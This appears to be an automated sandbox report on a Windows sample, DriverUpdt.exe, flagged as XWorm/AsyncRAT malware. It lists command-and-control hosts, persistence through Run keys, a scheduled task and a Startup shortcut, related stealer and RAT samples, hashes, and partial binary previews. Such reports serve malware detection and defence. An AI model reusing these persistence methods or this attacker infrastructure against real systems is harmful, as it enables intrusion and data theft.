https://g.live.com/odclientsettings/Prod/C: | Source: edb.log.18.dr, qmgr.db.18.dr | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://crl.m | Source: powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.microsoom/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0l | Source: powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://ion=v4.5mConsumererv | Source: powershell.exe, 00000002.00000002.2127592677.0000029C74A39000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://crl.microsp | Source: powershell.exe, 0000000A.00000002.2583865294.0000014E38E00000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://schemas.xmlsoap.org/wsdl/ | Source: powershell.exe, 00000002.00000002.2102983893.0000029C5C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C98B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A66AA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
https://contoso.com/ | Source: powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
https://nuget.org/nuget.exe | Source: powershell.exe, 00000002.00000002.2119512647.0000029C6C39F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2209288191.00000135D96FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359742614.0000019A7675F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
http://crl.micft.cMicRosof | Source: powershell.exe, 00000005.00000002.2227719144.00000135E1DF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://aka.ms/pscore68 | Source: powershell.exe, 00000002.00000002.2102983893.0000029C5C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C9691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A666F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E20711000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
http://www.microsoft.c | Source: powershell.exe, 00000008.00000002.2385082051.0000019A7EEF8000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: DriverUpdt.exe, 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2102983893.0000029C5C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C9691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A666F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E20711000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
http://crl.micros | Source: powershell.exe, 00000005.00000002.2225891671.00000135E1C30000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
193.161.193.99 | stewiegriffin-37537.portmap.host | Russian Federation | 198134 | BITREE-ASRU | true
                          IP
                          127.0.0.1
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1465719
                          Start date and time:2024-07-02 00:32:53 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:21
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:DriverUpdt.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@21/25@2/3
                          EGA Information:
                          • Successful, ratio: 14.3%
                          HCA Information:
                          • Successful, ratio: 95%
                          • Number of executed functions: 76
                          • Number of non-executed functions: 5
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 184.28.90.27
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target DriverUpdt, PID 3008 because it is empty
                          • Execution Graph export aborted for target DriverUpdt, PID 4768 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 348 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 3924 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 5388 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7084 because it is empty
• Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: DriverUpdt.exe
Time | Type | Description
00:34:41 | Task Scheduler | Run new task: DriverUpdt path: C:\Users\user\AppData\Roaming\DriverUpdt
00:34:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DriverUpdt C:\Users\user\AppData\Roaming\DriverUpdt
00:34:51 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DriverUpdt C:\Users\user\AppData\Roaming\DriverUpdt
00:34:59 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnk
18:33:46 | API Interceptor | 54x Sleep call for process: powershell.exe modified
18:34:44 | API Interceptor | 117106x Sleep call for process: DriverUpdt.exe modified
18:34:51 | API Interceptor | 2x Sleep call for process: svchost.exe modified
18:34:51 | API Interceptor | 2x Sleep call for process: OpenWith.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | rinvoice.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | rQuotation.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 8f5WsFcnTc.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | ZkqNrYh5cV.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | rQoutation.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | v31TgVEtHi.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | yVtOz1fD5G.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 8w5wHh755H.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 001 Tech. Spec pdf.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | doc -scan file.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
193.161.193.99 | Yq5Gp2g2vB.exe | malicious | RedLine | okmaq-24505.portmap.host:24505/
193.161.193.99 | JnBNepHH7K.exe | malicious | AsyncRAT RedLine | exara32-64703.portmap.host:64703/
193.161.193.99 | 99SKW728vf.exe | malicious | RedLine | lottie9nwtina-55339.portmap.host:55339/
193.161.193.99 | amazoninvoiceAF0388d83739dee83479171dbcf.exe | malicious | RedLine | tete2792-22120.portmap.host:22120//
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | rinvoice.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | rQuotation.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 8f5WsFcnTc.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | ZkqNrYh5cV.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | rQoutation.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | v31TgVEtHi.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | yVtOz1fD5G.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 8w5wHh755H.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 001 Tech. Spec pdf.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | doc -scan file.exe | malicious | AgentTesla | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
BITREE-ASRU | password.exe | malicious | SugarDump, XWorm | 193.161.193.99
BITREE-ASRU | Project Al Ain (Hilli & Al Fou#U2019ah) Parks.vbe | malicious | StormKitty, XWorm | 193.161.193.99
BITREE-ASRU | 9Ok3QP5FFV.exe | malicious | AsyncRAT, DcRat | 193.161.193.99
BITREE-ASRU | Client.exe | malicious | Quasar | 193.161.193.99
BITREE-ASRU | siuu.exe | malicious | XWorm | 193.161.193.99
BITREE-ASRU | y0w04xGM45.exe | malicious | PureLog Stealer, XWorm | 193.161.193.99
BITREE-ASRU | Se7CZnlXZZ.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 193.161.193.99
BITREE-ASRU | fP4kybhBWi.exe | malicious | Quasar | 193.161.193.99
BITREE-ASRU | zTuiDLpfjZ.exe | malicious | Quasar | 193.161.193.99
BITREE-ASRU | bUmi.exe | malicious | Njrat | 193.161.193.99
TUT-ASUS | rinvoice.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | rQuotation.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 8f5WsFcnTc.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | ZkqNrYh5cV.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | rQoutation.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | v31TgVEtHi.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | yVtOz1fD5G.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 8w5wHh755H.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 001 Tech. Spec pdf.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | doc -scan file.exe | malicious | AgentTesla | 208.95.112.1
                          No context
                          No context
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.8307301594197765
                          Encrypted:false
                          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugZ:gJjJGtpTq2yv1AuNZRY3diu8iBVqFz
                          MD5:37EA4D4C095492AB5D976770EED6337E
                          SHA1:E30445DA165D07A0143C9F655CE92E1A39BFE94A
                          SHA-256:80DEBE333007A8E504D902BF9D0DD56C23EED5FE1896A70241530D8D0CEFEE8A
                          SHA-512:38774B18427E1F9CDA4CFFF52C7AF47EBBD1B10FE57898BFA028DC55F6FF88D4C053747856552A585C200636F02953FF455C8C3A5D3456720494E280A1A40981
                          Malicious:false
                          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7693279d, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.6586182627060748
                          Encrypted:false
                          SSDEEP:1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
                          MD5:440120B60582CFACAF0BD49823FF4094
                          SHA1:10332A44BCBB3CA8D019A3110F79CCF88F83A49A
                          SHA-256:5209D5563A272C96AA4580DDCCC38581D30AC2203D1EB85DBAFEAF1A250DC8E7
                          SHA-512:42915A9B8F43EC1EB51D58EB7E313728ACBF5A84CAA416397ADFBC73E5345345C761881950CD8C176A9480C0A616E9BB4ABF702FD11F2F110BBF5D9469DDF396
                          Malicious:false
                          Preview:v.'.... ...............X\...;...{......................0.z..........{..3"...|y.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.....................................3"...|..................}...3"...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\svchost.exe
                          File Type:OpenPGP Secret Key
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.08124453285313288
                          Encrypted:false
                          SSDEEP:3:XXEYehoiZ4wulekGuAJkhvekl19CllYllrekGltll/SPj:XXEzhoztrxlLmeJe3l
                          MD5:29454DA74EDCF276550237745DAF0477
                          SHA1:A3DA122C6DD000BE16A309F6952C6A6292F99FF7
                          SHA-256:4C174535E64691CBF8F73DC8BBDF952FA9C4215512CF5B18F318AFE95D4935E1
                          SHA-512:CBC54BFDA1506E46A14214EE1ADE8EF30CD67C5D0BEA8C1450FDD2D3147B90C4DB768FB2BA72F35CB96E962C8F3BDE7D1524D5580DDC827FB4D1F858AB4BF0A9
                          Malicious:false
                          Preview:.{!i.....................................;...{..3"...|.......{...............{.......{...XL......{..................}...3"...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Roaming\DriverUpdt
                          File Type:CSV text
                          Category:dropped
                          Size (bytes):654
                          Entropy (8bit):5.380476433908377
                          Encrypted:false
                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:modified
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................
                          Process:C:\Users\user\Desktop\DriverUpdt.exe
                          File Type:Generic INItialization configuration [WIN]
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):3.6722687970803873
                          Encrypted:false
                          SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                          MD5:DE63D53293EBACE29F3F54832D739D40
                          SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                          SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                          SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                          Malicious:false
                          Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\DriverUpdt.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):86528
                          Entropy (8bit):5.924066251460331
                          Encrypted:false
                          SSDEEP:1536:hZN9jYzwjg6XJlg1cpGxCgN6Fg94b6lFsmqsb7FHxQ6w3k08Bn6ZKsGOPVtrhID:hDJFjP3gOKLN6Frb6lEcRx30MlOPVFGD
                          MD5:65485B0475B6C8A3B4F35BBA541938A6
                          SHA1:28E6E6CD2EBF8A9FDFFEB4AEBA13B70EA7EA03A3
                          SHA-256:C6740EE5C8AFDC2C7BE42FB03AB5A346925EFC6AC785FE7D68DEC2D5F05D276B
                          SHA-512:034303EE48132B80DA79E54A6077676CFD436EF869493A11A27C29DC7CB730FD2CE902320D554A0CDE81FC0A06F6C56EFA5C170A1360906EC9FA7FD101C3706D
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 84%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rwf.................H..........^g... ........@.. ....................................@..................................g..O.................................................................................... ............... ..H............text...dG... ...H.................. ..`.rsrc................J..............@..@.reloc...............P..............@..B................@g......H........d..........&.....................................................(....*.r...p*. ..d.*..(....*.rG..p*. .b..*.s.........s.........s.........s.........*.r...p*. .l..*.rU..p*. ....*.r...p*. 3wx.*.rc..p*. ....*.r...p*. z.6.*..((...*.r...p*. j...*.r...p*. .q..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. "Y..*.r5..p*. ...*.r...p*. ..e.*.r...p*. .O..*.r...p*. S...*.rQ..p*. .t..*.r..
                          Process:C:\Users\user\Desktop\DriverUpdt.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jul 1 21:34:39 2024, mtime=Mon Jul 1 21:34:39 2024, atime=Mon Jul 1 21:34:39 2024, length=86528, window=hide
                          Category:dropped
                          Size (bytes):758
                          Entropy (8bit):5.027512260081178
                          Encrypted:false
                          SSDEEP:12:8t64f3xy88Cv7lsY//3kJLaTrGKA/zjAshcFHpRCqLGAnmV:81fBp8Q7Z8FcB0AshclC8GAnm
                          MD5:B28360C3527ACFAE4AFAF4F032A823C1
                          SHA1:ACADBD3FD5486B0877514B229D0A6E50BE97D46B
                          SHA-256:35149B831F74E6ACC19D3F820A24D65364AED40C0A260E04EA80DF0A3DCAD264
                          SHA-512:37E4B04D1CD6E649A07F293312872158FE4DDE3A97C69A16B90396D5E226CA536A4EA2D300712EC96D6224A58BF4774A84B74C94F39C77FACA0627321AE2CC06
                          Malicious:false
                          Preview:L..................F.... ...a.K.....a.K.....a.K......R......................r.:..DG..Yr?.D..U..k0.&...&...... M......._.......`.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X4.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X2...Roaming.@......DWSl.X2.....C........................R.o.a.m.i.n.g.....^.2..R...XT. .DRIVER~1..F.......XT..XT...../......................}..D.r.i.v.e.r.U.p.d.t.......Y...............-.......X............Fca.....C:\Users\user\AppData\Roaming\DriverUpdt........\.....\.....\.....\.....\.D.r.i.v.e.r.U.p.d.t.`.......X.......980108...........hT..CrF.f4... .z.V..7...,...W..hT..CrF.f4... .z.V..7...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                          Process:C:\Windows\System32\svchost.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):55
                          Entropy (8bit):4.306461250274409
                          Encrypted:false
                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                          Malicious:false
                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):5.924066251460331
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          • Win32 Executable (generic) a (10002005/4) 49.75%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:DriverUpdt.exe
                          File size:86'528 bytes
                          MD5:65485b0475b6c8a3b4f35bba541938a6
                          SHA1:28e6e6cd2ebf8a9fdffeb4aeba13b70ea7ea03a3
                          SHA256:c6740ee5c8afdc2c7be42fb03ab5a346925efc6ac785fe7d68dec2d5f05d276b
                          SHA512:034303ee48132b80da79e54a6077676cfd436ef869493a11a27c29dc7cb730fd2ce902320d554a0cde81fc0a06f6c56efa5c170a1360906ec9fa7fd101c3706d
